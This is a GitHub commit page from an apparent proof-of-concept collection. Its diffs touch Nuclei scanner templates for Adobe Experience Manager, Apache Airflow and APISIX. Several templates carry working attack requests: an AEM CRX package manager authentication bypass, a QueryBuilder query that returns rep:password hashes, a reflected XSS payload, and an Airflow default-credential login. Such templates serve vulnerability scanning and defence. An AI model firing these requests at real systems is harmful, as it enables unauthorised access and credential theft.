20240927

adysec · Sep 27, 2024 · 1ee0d97 · 1ee0d97
1 parent 10273e5
commit 1ee0d97
Show file tree

Hide file tree

Showing 1,236 changed files with 19,819 additions and 12,261 deletions.
diff --git a/date.txt b/date.txt
@@ -1 +1 @@
-20240926
+20240927
diff --git a/poc.txt b/poc.txt
diff --git a/poc/adobe/AEM_misconfig.yaml b/poc/adobe/AEM_misconfig.yaml
@@ -1,8 +1,10 @@
 id: aem-misconfigs
+
 info:
   name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with
   author: panch0r3d
   severity: high
+
 requests:
   - method: GET
     path:

diff --git a/poc/adobe/adobe-connect-central-login-95.yaml b/poc/adobe/adobe-connect-central-login-95.yaml
@@ -1,23 +1,23 @@
-id: adobe-connect-central-login
-
-info:
-  name: Adobe Connect Central Login
-  author: dhiyaneshDk
-  severity: info
-  tags: adobe,panel
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/system/login"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Adobe Connect Central Login</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+id: adobe-connect-central-login
+
+info:
+  name: Adobe Connect Central Login
+  author: dhiyaneshDk
+  severity: info
+  tags: adobe,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/system/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Adobe Connect Central Login</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/adobe/aem-crx-bypass-134.yaml b/poc/adobe/aem-crx-bypass-134.yaml
@@ -1,26 +1,25 @@
 id: aem-crx-bypass
-
 info:
+  name: AEM Package Manager - Authentication Bypass
   author: dhiyaneshDK
-  name: AEM CRX Bypass
+  description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
   severity: critical
-  reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
-  tags: aem
-
+  remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
+  reference:
+    - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
+  tags: aem,adobe
 requests:
   - raw:
       - |
         GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
         Host: {{Hostname}}
         Referer: {{BaseURL}}
         Accept-Encoding: gzip, deflate
-
       - |
         GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
         Host: {{Hostname}}
         Referer: {{BaseURL}}
         Accept-Encoding: gzip, deflate
-
     matchers-condition: and
     matchers:
       - type: word
@@ -30,12 +29,12 @@ requests:
           - 'downloadName'
           - 'acHandling'
         condition: and
-
       - type: word
         part: header
         words:
           - 'application/json'
-
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/poc/adobe/aem-default-get-servlet-135.yaml b/poc/adobe/aem-default-get-servlet-135.yaml
@@ -1,15 +1,15 @@
 id: aem-default-get-servlet
+
 info:
-  author: DhiyaneshDk
   name: AEM DefaultGetServlet
+  author: DhiyaneshDk
   severity: low
   description: Sensitive information might be exposed via AEM DefaultGetServlet.
   reference:
     - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
     - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
   tags: aem,adobe
 
-
 requests:
   - method: GET
     path:

diff --git a/poc/adobe/aem-hash-querybuilder.yaml b/poc/adobe/aem-hash-querybuilder.yaml
@@ -10,13 +10,9 @@ requests:
       - |
         GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
-        Connection: close
-        Upgrade-Insecure-Requests: 1
-        Cache-Control: max-age=0
     matchers-condition: and
     matchers:
       - type: status
@@ -26,3 +22,4 @@ requests:
         words:
           - '"success":true'
           - 'rep:password'
+        condition: and
diff --git a/poc/adobe/aem-jcr-querybuilder-165.yaml b/poc/adobe/aem-jcr-querybuilder-165.yaml
@@ -1,8 +1,8 @@
 id: aem-jcr-querybuilder
 
 info:
-  author: DhiyaneshDk
   name: Query JCR role via QueryBuilder Servlet
+  author: DhiyaneshDk
   severity: info
   tags: aem
 
@@ -11,13 +11,9 @@ requests:
       - |
         GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
-        Connection: close
-        Upgrade-Insecure-Requests: 1
-        Cache-Control: max-age=0
 
     matchers-condition: and
     matchers:
@@ -28,4 +24,5 @@ requests:
       - type: word
         words:
           - '"success":true'
-          - 'jcr:uuid'
+          - 'jcr:uuid'
+        condition: and
diff --git a/poc/adobe/aem-querybuilder-feed-servlet-177.yaml b/poc/adobe/aem-querybuilder-feed-servlet-177.yaml
@@ -1,13 +1,13 @@
 id: aem-querybuilder-feed-servlet
 
 info:
-  name: AEM QueryBuilder Feed Servlet
   author: DhiyaneshDk
+  name: AEM QueryBuilder Feed Servlet
   severity: info
-  reference:
-    - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
+  reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
   tags: aem
 
+
 requests:
   - method: GET
     path:

diff --git a/poc/adobe/aem-wcm-suggestions-servlet.yaml b/poc/adobe/aem-wcm-suggestions-servlet.yaml
@@ -1,13 +1,12 @@
 id: aem-wcm-suggestions-servlet
-
 info:
-  name: AEM WCM Suggestions Servlet
   author: DhiyaneshDk
+  name: AEM WCM Suggestions Servlet
   severity: low
-  reference:
-    - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96
+  reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96
   tags: aem
 
+
 requests:
   - method: GET
     path:

diff --git a/poc/adobe/aem-xss-childlist.yaml b/poc/adobe/aem-xss-childlist.yaml
@@ -1,31 +1,26 @@
 id: aem-xss-childlist
 
 info:
-  name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting
+  name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting
   author: theabhinavgaur
   severity: medium
   description: |
-    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the childlist selector when a dispatcher does not respect the content type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 5.4
-    cwe-id: CWE-80
+    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
   metadata:
     verified: true
-    max-request: 2
     shodan-query:
       - http.title:"AEM Sign In"
       - http.component:"Adobe Experience Manager"
-  tags: xss,aem,adobe,misconfig
+  tags: xss,aem,adobe
 
-http:
+
+requests:
   - method: GET
     path:
       - "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
       - "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"
 
     stop-at-first-match: true
-
     matchers-condition: and
     matchers:
       - type: word
@@ -48,5 +43,3 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100ea901d01b02a06ee948fb8452ddf1936c377d4006e2ca155085a17be6a37146502203245bd45cb13c228f5bbd013c7157d8ed9d98e3671068621b999ad3bded15e5d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/airflow/airflow-default-login-235.yaml b/poc/airflow/airflow-default-login-235.yaml
@@ -1,4 +1,5 @@
 id: airflow-default-login
+
 info:
   name: Apache Airflow Default Login
   author: pdteam
@@ -13,12 +14,14 @@ info:
   metadata:
     shodan-query: title:"Sign In - Airflow"
   tags: airflow,default-login,apache
+
 requests:
   - raw:
       - |
         GET /login/ HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
+
       - |
         POST /login/ HTTP/1.1
         Host: {{Hostname}}
@@ -27,12 +30,14 @@ requests:
         Referer: {{BaseURL}}/admin/airflow/login
 
         username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
+
     attack: pitchfork
     payloads:
       username:
         - airflow
       password:
         - airflow
+
     cookie-reuse: true
     extractors:
       - type: regex
@@ -41,6 +46,7 @@ requests:
         internal: true
         regex:
           - 'type="hidden" value="(.*?)">'
+
     req-condition: true
     matchers-condition: and
     matchers:
@@ -50,6 +56,7 @@ requests:
           - 'contains(all_headers_2, "session=.")'
           - 'status_code_2 == 302'
         condition: and
+
       - type: word
         words:
           - 'You should be redirected automatically to target URL: <a href="/">'

diff --git a/poc/airflow/airflow-detect-239.yaml b/poc/airflow/airflow-detect-239.yaml
@@ -21,4 +21,4 @@ requests:
 
       - type: status
         status:
-          - 404
+          - 404
diff --git a/poc/airflow/unauthenticated-airflow-10884.yaml b/poc/airflow/unauthenticated-airflow-10884.yaml
@@ -3,21 +3,22 @@ info:
   name: Unauthenticated Airflow Instance
   author: dhiyaneshDK
   severity: high
-  metadata:
-    shodan-query: title:"Airflow - DAGs"
   tags: apache,airflow,unauth
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}"
       - "{{BaseURL}}/admin/"
-    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        words:
+          - "Content-Type: text/html"
+        part: header
+      - type: word
         words:
           - "<title>Airflow - DAGs</title>"
+        part: body
+        condition: and
       - type: status
         status:
           - 200
diff --git a/poc/apache/apache-apisix-panel.yaml b/poc/apache/apache-apisix-panel.yaml
@@ -1,12 +1,18 @@
 id: apache-apisix-panel
 
 info:
-  name: Apache APISIX Panel detect
+  name: Apache APISIX Login Panel
   author: pikpikcu
   severity: info
+  description: An Apache APISIX login panel was detected.
   metadata:
     fofa-query: title="Apache APISIX Dashboard"
   tags: apache,apisix,panel
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cve-id:
+    cwe-id: CWE-200
 
 requests:
   - method: GET
@@ -23,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/03/16